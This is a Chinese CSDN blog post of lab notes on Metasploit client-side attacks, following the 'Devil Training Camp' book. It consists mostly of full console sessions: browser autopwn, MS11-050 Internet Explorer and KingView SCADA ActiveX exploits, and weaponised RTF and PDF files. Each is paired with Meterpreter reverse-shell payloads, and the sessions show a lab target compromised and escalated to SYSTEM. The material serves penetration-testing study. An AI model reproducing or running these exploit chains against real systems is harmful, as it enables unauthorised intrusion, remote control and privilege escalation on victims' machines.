《Metasploit 魔鬼训练营》06 客户端渗透攻击

最新推荐文章于 2023-05-07 19:40:32 发布
最新推荐文章于 2023-05-07 19:40:32 发布
阅读量2.4k 收藏 7
点赞数
分类专栏: kali-linux 文章标签: msf-渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kevinhanser/article/details/78466534
版权

本文记录 Kali Linux 2017.1 学习使用 Metasploit 的详细过程

  1. MSF 中自动化浏览器攻击
  2. MS11-050 安全漏洞
  3. KingView 渗透攻击过程
    4.MS10-087 安全漏洞
  4. Adoba阅读器渗透攻击案例

###1.MSF 中自动化浏览器攻击 ###

msf auxiliary(browser_autopwn2) > search browser_autopwn

Matching Modules
================

   Name                               Disclosure Date  Rank    Description
   ----                               ---------------  ----    -----------
   auxiliary/server/browser_autopwn                    normal  HTTP Client Automatic Exploiter
   auxiliary/server/browser_autopwn2  2015-07-05       normal  HTTP Client Automatic Exploiter 2 (Browser Autopwn)


msf auxiliary(browser_autopwn2) > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > show options 

Module options (auxiliary/server/browser_autopwn):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   LHOST                     yes       The IP address to use for reverse-connect payloads
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  Start a bunch of modules and direct clients to appropriate exploits


msf auxiliary(browser_autopwn) > set LHOST 10.10.10.128
LHOST => 10.10.10.128
msf auxiliary(browser_autopwn) > set SRVHOST 10.10.10.128
SRVHOST => 10.10.10.128
msf auxiliary(browser_autopwn) > set URIPATH auto
URIPATH => auto
msf auxiliary(browser_autopwn) > run
[*] Auxiliary module execution completed
[*] Setup
[*] Starting exploit modules on host 10.10.10.128...
[*] ---
[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/KEQN
[*] Server started.
[*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp                                [*] Using URL: http://10.10.10.128:8080/DojeEicHhli
[*] Server started.
# 靶机浏览器访问 http://10.10.10.128:8080\auto 之后
# 返回查看 msf 信息
[*] 10.10.10.254     adobe_flash_hacking_team_uaf - Request: /vZlLWxCXzIS/gbBUII/
[*] 10.10.10.254     adobe_flash_hacking_team_uaf - Sending HTML...
[*] 10.10.10.254     adobe_flash_hacking_team_uaf - Request: /vZlLWxCXzIS/gbBUII/wXWj.swf
[*] 10.10.10.254     adobe_flash_hacking_team_uaf - Sending SWF...
[*] 10.10.10.254     wellintech_kingscada_kxclientdownload - Requested: /SzjZbOOOH/OMcEvw/
[*] 10.10.10.254     wellintech_kingscada_kxclientdownload - Sending KingScada kxClientDownload.ocx ActiveX Remote Code Execution
[*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/hjZLLYcGnJhR
[*] Server started.
[*] 10.10.10.254     ms14_064_ole_code_execution - Sending exploit...
[*] 10.10.10.254     ms14_064_ole_code_execution - Sending VBS stager
[*] Meterpreter session 1 opened (10.10.10.128:4444 -> 10.10.10.254:1062) at 2017-09-20 02:02:34 -0400
[*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/VAMgZvloTyhw
[*] --- Done, found 20 exploit modules

[*] Using URL: http://10.10.10.128:8080/auto
[-] Auxiliary failed: Rex::RuntimeError The supplied resource '/auto' is already added.
[-] Call stack:
[-]   /usr/share/metasploit-framework/lib/msf/core/exploit/http/server.rb:411:in `add_resource'
[-]   /usr/share/metasploit-framework/lib/msf/core/exploit/http/server.rb:188:in `start_service'
[-]   /usr/share/metasploit-framework/lib/msf/core/exploit/tcp_server.rb:49:in `exploit'
[-]   /usr/share/metasploit-framework/modules/auxiliary/server/browser_autopwn.rb:171:in `run'
[*] Cleaning up exploits...
[*] Server stopped.

###2. MS11-050 安全漏洞 ###

msf > search ms11_050
	Matching Modules
	================
	   Name                                                    Disclosure Date  Rank    Description
	   ----                                                    ---------------  ----    -----------
	   exploit/windows/browser/ms11_050_mshtml_cobjectelement  2011-06-16       normal  MS11-050 IE mshtml!CObjectElement Use After Free
msf > use exploit/windows/browser/ms11_050_mshtml_cobjectelement 
msf exploit(ms11_050_mshtml_cobjectelement) > info 
		   Name: MS11-050 IE mshtml!CObjectElement Use After Free
		 Module: exploit/windows/browser/ms11_050_mshtml_cobjectelement
	   Platform: Windows
	 Privileged: No
		License: Metasploit Framework License (BSD)
		   Rank: Normal
	  Disclosed: 2011-06-16
	Provided by:
	  d0c_s4vage
	  sinn3r <sinn3r@metasploit.com>
	  bannedit <bannedit@metasploit.com>
	Available targets:
	  Id  Name
	  --  ----
	  0   Automatic
	  1   Internet Explorer 7 on XP SP3
	  2   Internet Explorer 7 on Windows Vista
	  3   Internet Explorer 8 on XP SP3
	  4   Internet Explorer 8 on Windows 7
	  5   Debug Target (Crash)
	Basic options:
	  Name       Current Setting  Required  Description
	  ----       ---------------  --------  -----------
	  OBFUSCATE  false            no        Enable JavaScript obfuscation
	  SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
	  SRVPORT    8080             yes       The local port to listen on.
	  SSL        false            no        Negotiate SSL for incoming connections
	  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
	  URIPATH                     no        The URI to use for this exploit (default is random)
	Payload information:
	  Space: 500
	  Avoid: 6 characters
	Description:
	  This module exploits a use-after-free vulnerability in Internet 
	  Explorer. The vulnerability occurs when an invalid <object> tag 
	  exists and other elements overlap/cover where the object tag should 
	  be when rendered (due to their styles/positioning). The 
	  mshtml!CObjectElement is then freed from memory because it is 
	  invalid. However, the mshtml!CDisplay object for the page continues 
	  to keep a reference to the freed <object> and attempts to call a 
	  function on it, leading to the use-after-free. Please note that for 
	  IE 8 targets, JRE (Java Runtime Environment) is required to bypass 
	  DEP (Data Execution Prevention).
	References:
	  https://cvedetails.com/cve/CVE-2011-1260/
	  OSVDB (72950)
	  https://technet.microsoft.com/en-us/library/security/MS11-050
	  http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html
msf exploit(ms11_050_mshtml_cobjectelement) > set payload windows/meterpreter/reverse_http
	payload => windows/meterpreter/reverse_http
msf exploit(ms11_050_mshtml_cobjectelement) > show options 
	Module options (exploit/windows/browser/ms11_050_mshtml_cobjectelement):
	   Name       Current Setting  Required  Description
	   ----       ---------------  --------  -----------
	   OBFUSCATE  false            no        Enable JavaScript obfuscation
	   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
	   SRVPORT    8080             yes       The local port to listen on.
	   SSL        false            no        Negotiate SSL for incoming connections
	   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
	   URIPATH                     no        The URI to use for this exploit (default is random)
	Payload options (windows/meterpreter/reverse_http):
	   Name      Current Setting  Required  Description
	   ----      ---------------  --------  -----------
	   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
	   LHOST                      yes       The local listener hostname
	   LPORT     8080             yes       The local listener port
	   LURI                       no        The HTTP Path
	Exploit target:
	   Id  Name
	   --  ----
	   0   Automatic
msf exploit(ms11_050_mshtml_cobjectelement) > set URIPATH ms11050
	TH => ms11050
msf exploit(ms11_050_mshtml_cobjectelement) > set LHOST 10.10.10.128
	OST => 10.10.10.128
msf exploit(ms11_050_mshtml_cobjectelement) > set LPORT 8443
msf exploit(ms11_050_mshtml_cobjectelement) > exploit 
	[*] Exploit running as background job.
	[*] Started HTTP reverse handler on http://10.10.10.128:8443
	[*] Using URL: http://0.0.0.0:8080/ms11050
	msf exploit(ms11_050_mshtml_cobjectelement) > [*] Local IP: http://10.10.10.128:8080/ms11050
	[*] Server started.
# 靶机浏览器访问 http://10.10.10.128:8080/ms11050 之后
# 返回查看 msf 信息	
	[*] 10.10.10.254     ms11_050_mshtml_cobjectelement - Sending exploit (Internet Explorer 7 on XP SP3)...
	[*] 10.10.10.254     ms11_050_mshtml_cobjectelement - Sending exploit (Internet Explorer 7 on XP SP3)...
	[*] 10.10.10.254     ms11_050_mshtml_cobjectelement - Sending exploit (Internet Explorer 7 on XP SP3)...

###3.KingView 渗透攻击过程 ###

http://www.cnblogs.com/justforfun12/p/5324408.html
链接:http://pan.baidu.com/s/1geScJa7 密码:r9a5
放在 /usr/share/metasploit-framework/modules/exploits/windows/browser 这个目录

msf > search kingview
	Matching Modules
	================
	   Name                                                         Disclosure Date  Rank    Description
	   ----                                                         ---------------  ----    -----------
	   exploit/windows/browser/kingview_SCADA_activeX_validateuser  2011-03-07       normal  KingView 6.5.3 KVWebSvr.dll ActiveX ValidateUser Buffer Overflow
	   exploit/windows/fileformat/kingview_kingmess_kvl             2012-11-20       normal  KingView Log File Parsing Buffer Overflow
	   exploit/windows/scada/KingView6.53overflow                                    good    Kingview 6.53 SCADA HMI HistorySvr Heap Overflow
	   exploit/windows/scada/KingView6.53overflow                                    good    Kingview 6.53 SCADA HMI HistorySvr Heap Overflow

msf > use exploit/windows/browser/kingview_SCADA_activeX_validateuser 
msf exploit(kingview_SCADA_activeX_validateuser) > show options 
	Module options (exploit/windows/browser/kingview_SCADA_activeX_validateuser):
	   Name     Current Setting  Required  Description
	   ----     ---------------  --------  -----------
	   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
	   SRVPORT  8080             yes       The local port to listen on.
	   SSL      false            no        Negotiate SSL for incoming connections
	   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
	   URIPATH  /                yes       The URI to use.
	Exploit target:
	   Id  Name
	   --  ----
	   0   Automatic
msf exploit(kingview_SCADA_activeX_validateuser) > set URIP
	set URIPATH  set URIPORT  
msf exploit(kingview_SCADA_activeX_validateuser) > set URIPATH kingview
	URIPATH => kingview
msf exploit(kingview_SCADA_activeX_validateuser) > set payload windows/meterpreter/reverse_http
	payload => windows/meterpreter/reverse_http
msf exploit(kingview_SCADA_activeX_validateuser) > set LHOST 10.10.10.128
	LHOST => 10.10.10.128
msf exploit(kingview_SCADA_activeX_validateuser) > set SRVHOST 10.10.10.128
	SRVHOST => 10.10.10.128
msf exploit(kingview_SCADA_activeX_validateuser) > set LPORT 8443
	LPORT => 8443
msf exploit(kingview_SCADA_activeX_validateuser) > exploit 
	[*] Exploit running as background job.

	[*] Started HTTP reverse handler on http://10.10.10.128:8443
	[*] Using URL: http://10.10.10.128:8080/kingview
	[*] Server started.
# 靶机浏览器访问 http://10.10.10.128:8080/kingview 之后
# 返回查看 msf 信息
	[-] 10.10.10.254     kingview_SCADA_activeX_validateuser - Exception handling request: No encoders encoded the buffer successfully.
	[*] 10.10.10.254     kingview_SCADA_activeX_validateuser - Sending KingView 6.5.3 KVWebSvr.dll ActiveX ValidateUser Buffer Overflow to 10.10.10.254:1045...

###4.MS10-087 安全漏洞 ###

# 先生成渗透文件
msf > search ms10_087
	Matching Modules
	================
	   Name                                                    Disclosure Date  Rank   Description
	   ----                                                    ---------------  ----   -----------
	   exploit/windows/fileformat/ms10_087_rtf_pfragments_bof  2010-11-09       great  MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)
msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof 
msf exploit(ms10_087_rtf_pfragments_bof) > show options 
	Module options (exploit/windows/fileformat/ms10_087_rtf_pfragments_bof):
	   Name      Current Setting  Required  Description
	   ----      ---------------  --------  -----------
	   FILENAME  msf.rtf          yes       The file name.
	Exploit target:
	   Id  Name
	   --  ----
	   0   Automatic
msf exploit(ms10_087_rtf_pfragments_bof) > set payload windows/exec 
	payload => windows/exec
msf exploit(ms10_087_rtf_pfragments_bof) > set CMD calc.exe
	CMD => calc.exe
msf exploit(ms10_087_rtf_pfragments_bof) > set FILENAME ms10087.rtf
	FILENAME => ms10087.rtf
msf exploit(ms10_087_rtf_pfragments_bof) > exploit 
	[*] Creating 'ms10087.rtf' file ...
	[+] ms10087.rtf stored at /root/.msf4/local/ms10087.rtf
# 将渗透文件  /root/.msf4/local/ms10087.rtf 拷贝到靶机中并打开
# 弹出一个计算器,攻击成功

###5. Adoba阅读器渗透攻击案例 ###

# 配置测试模块生成文件
msf > search adobe_cool

Matching Modules
================

   Name                                            Disclosure Date  Rank   Description
   ----                                            ---------------  ----   -----------
   exploit/windows/browser/adobe_cooltype_sing     2010-09-07       great  Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow
   exploit/windows/fileformat/adobe_cooltype_sing  2010-09-07       great  Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow


msf > use exploit/windows/fileformat/adobe_cooltype_sing 
msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf exploit(adobe_cooltype_sing) > set LHOST 10.10.10.128
LHOST => 10.10.10.128
msf exploit(adobe_cooltype_sing) > set LPORT 8443
LPORT => 8443
msf exploit(adobe_cooltype_sing) > set FILENAME 2.pdf
FILENAME => 2.pdf
msf exploit(adobe_cooltype_sing) > run

[*] Creating '2.pdf' file...
[+] 2.pdf stored at /root/.msf4/local/2.pdf

# 将文件复制到靶机


# 启动监听端
msf exploit(adobe_cooltype_sing) > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf exploit(handler) > set LHOST 10.10.10.128
LHOST => 10.10.10.128
msf exploit(handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_http):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.10.128     yes       The local listener hostname
   LPORT     8080             yes       The local listener port
   LURI                       no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > exploit 

[*] Started HTTP reverse handler on http://10.10.10.128:8080


# 靶机打开文件后 msf 显示
[*] http://10.10.10.128:8443 handling request from 10.10.10.254; (UUID: duvbthou) Staging x86 payload (958035 bytes) ...
[*] Meterpreter session 1 opened (10.10.10.128:8443 -> 10.10.10.254:1048) at 2017-09-20 11:08:55 -0400
[*] Session ID 1 (10.10.10.128:8443 -> 10.10.10.254:1048) processing InitialAutoRunScript 'post/windows/manage/priv_migrate'
[*] Current session process is acrord32.exe (2136) as: DH-CA8822AB9589\Administrator
[*] Session is Admin but not System.
[*] Will attempt to migrate to specified System level process.
[*] Trying services.exe (716)
[+] Successfully migrated to services.exe (716) as: NT AUTHORITY\SYSTEM
网络安全打工人
关注
专栏目录
metasploit渗透测试魔鬼训练营》靶机演练之第五章实战案例KingView 6.53版本CVE-2011-0406漏洞
Donald Liang 的专栏
04-06 2156
在一个笔记本上开两个虚拟机有点卡,而且太麻烦,就把metasploit的目标靶机放在别的机器上了,ip自己配置了一下, 目标主机:192.168.137.254 入侵机:192.168.137.253 目标机上存在漏洞:KingView 6.53版本CVE-2011-0406漏洞,系统 win2003 SP0 下面进入正题: 在信息搜集中得知,目标主机开放了777端口,百度发现,
Metasploit魔鬼训练营》 第二、三章
oldmoon的博客
03-20 1411
目录 前言 一、靶场环境搭建 1.网络环境拓扑图 2.搭建过程中的 Q&A (1)Kali2xface(NAT模式) (2)metasploitable-Linux (桥接模式 + NAT模式) (3)OWASP (NAT模式) (4)Win2K3(NAT模式) (5)WinXP (仅主机模式) (6)一些问题 二、情报收集 1.流程图 2.外围信息收集 (1)搜索引擎 (2)metasploit辅助模块 (3)一些工具 心得 前言 在看《Web安全攻防--渗透
metasploit客户端渗透
zkwniky的博客
09-05 1267
0x00 概要 我们在无法突破对方的网络边界的时候,往往需要使用客户端渗透这种方式对目标发起攻击,比如我们想目标发一个含有后门的程序,或者是一个word文档、pdf文件。想要达到效果同时也要利用好社会工程学,来欺骗对方,使其中招。 这篇文章中我们主要会使用到metasploit中的msfvenom这个工具,如果大家对msfvenom这个工具不了解的话可以参考我这篇博客:metasploit
客户端渗透之——对网站的客户进行渗透
冰河的专栏
01-24 1457
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86632147 本次的渗透主要是找到有漏洞的网站,在有漏洞的网站中嵌入隐藏的iFrame,那么访问这个网站的所有系统都会遭受来自browser autopwn服务器的攻击。我们可以利用iFrame注入实现对网站用户的大规模入侵。 攻击网站的用户 具体实施 首先,我们要获...
Metasploit 魔鬼训练营》01 初识 Metasploit
kevinhanser
08-23 1638
1 . 使用 msf 图形化工具 armitage从 armitage 2 . 使用 msfconsole 控制台利用 samba 漏洞获取控制权 3 . 使用 msfconsole 控制台利用 VNC 漏洞获取控制权 4 . 总结过程
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-内网客户端渗透9.pdf 渗透测试-内网网络服务端渗透7.pdf 渗透测试-后渗透阶段10.pdf 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8.pdf 渗透测试-移动环境渗透3.pdf ...
openVAS漏洞扫描器---Metasploit渗透测试魔鬼训练营
aaqian1的博客
03-31 1484
OpenVAS可以用来识别远程主机,Web应用存在的各种漏洞。经过多年的发展,OpenVAS使用NVT(Network Vulnerability Test,网络漏洞测试)脚本对多种远程系统的安全问题进行检测。OpenVAS开发组维护了一套免费的NVT库,并定期对其进行更新,以保证可以检测出最新的系统漏洞。 一、配置 OpenVAS BT5中预装了OpenVAS网络漏洞扫描工具,使用前需要对它进...
渗透测试-内网客户端渗透.pdf
02-25
Metasploit渗透测试魔鬼训练营》读书笔记文档,是在我看书的过程中对书中理论和一些实践的总结。
第一章 魔鬼训练营--初识Metasploit
qq_31411551的博客
05-11 451
第一章 魔鬼训练营–初识Metasploit 课程 渗透测试就是一种通过模拟恶意攻击者的技术与方法,挫败目标系统安全控制措施,取得访问控制权,并发现具备业务影响后果安全隐患的一种安全测试与评估方法。一般分为黑盒测试 和 白盒测试 ,两种结合是灰盒测试。 白盒测试的最大问题在于无法有效地测试客户组织的应急响应程序,也无法判断他们的安全防护计划对检测特定攻击的频率。 渗透测试方法体系标准: 安全测试方法学开源手册(OSSTMM),NIST SP 800-42 网络安全测试指南,OWASP十大Web应用安全
Metasploit渗透测试实验报告
ling_xiao007的专栏
02-21 1万+
Metasploit渗透测试魔鬼训练营》一书采用独特的让读者成为虚拟渗透测试的主角的方式,经历一次对DVSSC公司网络的渗透测试任务。渗透测试的目标为DVSSC公司DMZ网段以及内网客户端主机。四个主机均存在严重漏洞缺陷,可执行不同方式的攻击方式。 信息搜集阶段获得了dvscc的域名注册信息、地理位置,以及DMZ网段操作系统版本、开放端口及其服务版本等信息,但域名注册信息存有疑问。 漏洞扫描阶段获得DMZ网段主机大量漏洞信息,可采取不同方式的攻击方式,如口令猜测、网络服务渗透攻击、浏览器渗
在Windows上安装Metasploit Framework 3.7.1出现问题及解决方法
03-25
。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。
windows server 2012 上 oracle客户端卸载步骤干净_攻防|客户端渗透
weixin_39609071的博客
10-25 638
客户端渗透漏洞实战·漏洞利用·提权需要用到的环境VMwarekali Linuxwin XPwin 7前言现实的网络中,企业已经非常注重安全,攻击者也逐步从服务器攻击转向客户端攻击,比如:安卓渗透、软件后门、0day等等。那么,是怎么实现客户端攻击的呢?某些操作系统和软件应用,没有打上相应的补丁,存在较多的漏洞或是后门,可以通过漏洞或后门进行提权,达到完全控制的效果。工具...
kali生成后门远程控制电脑或手机
wutiangui的博客
05-07 3626
问题:Metasploit渗透测试中出的错误 Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).点击.exe文件直接运行安装,运行,下一步,直接完成安装。Android模拟器(靶机1):192.168.0.106。2.1首先从官网上下载模拟器雷电地址点击打开链接。靶机:192.168.25.106。二、环境配置二Android模拟器。
组策略错误没有权限执行此操作_Metasploit PSExec执行报错大全
weixin_39915815的博客
11-22 4420
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。所有话题标签:#Web安全 #漏洞复现 #工具使用 #权限提升#权限维持#防护绕过#内网安全 #实战案例#其他笔记 #资源分享 ...
Metasploit 魔鬼训练营》05 网络服务渗透攻击
kevinhanser
11-07 4410
本文记录 Kali Linux 2017.1 学习使用 Metasploit 的详细过程 1. 内存攻防技术 2. MS08-067 攻击案例 3. Oricle 数据库 4. KingView 6.53 HistorySrv 渗透攻击 5. Samba 安全漏洞
kali 输入 msfconsole 启动报错:/usr/share/metasploit-framework/lib/msf/core/payload/android.rb:87
烟敛寒林的博客
11-24 7536
kali   启动 msfconsole 时候失败,报错: root@kali:~# msfconsole /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:87:in `not_after=': bignum too big to convert into `long' (RangeError)         fro...
靶机渗透练习96-hacksudo:Thor
hirak0的博客
05-09 1692
靶机描述 靶机地址:https://www.vulnhub.com/entry/hacksudo-thor,733/ Description Box created by vishal Waghmare This box should be easy to medium . This machine was created for the InfoSec Prep Discord Server ( https://discord.gg/kDyAKtJs ) Website (https://hacksud
metasploit文件格式漏洞渗透攻击(成功生成doc)
天元喜羊羊的博客
05-13 2890
因为BT5R3失败了,所以现在换成了BT5R1。 msf > use windows/fileformat/ms11_006_createsizeddibsection msf exploit(ms11_006_createsizeddibsection) > set payload windows/meterpreter/reverse_tcp payload => windows/mete
初探Meterpreter
热门推荐
要不,单步调试走起?
12-06 1万+
强大的Meterpreter,让目标机像你的孩子一样听话~~
metasploit渗透测试 魔鬼训练营
最新发布
12-31
Metasploit是一款广泛使用的渗透测试工具,也被称为"魔鬼训练营"。它是开源的,提供了一系列强大的功能和模块,用于发现和利用计算机系统中的漏洞,以评估系统的安全性和弱点。 Metasploit魔鬼训练营之所以得名,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值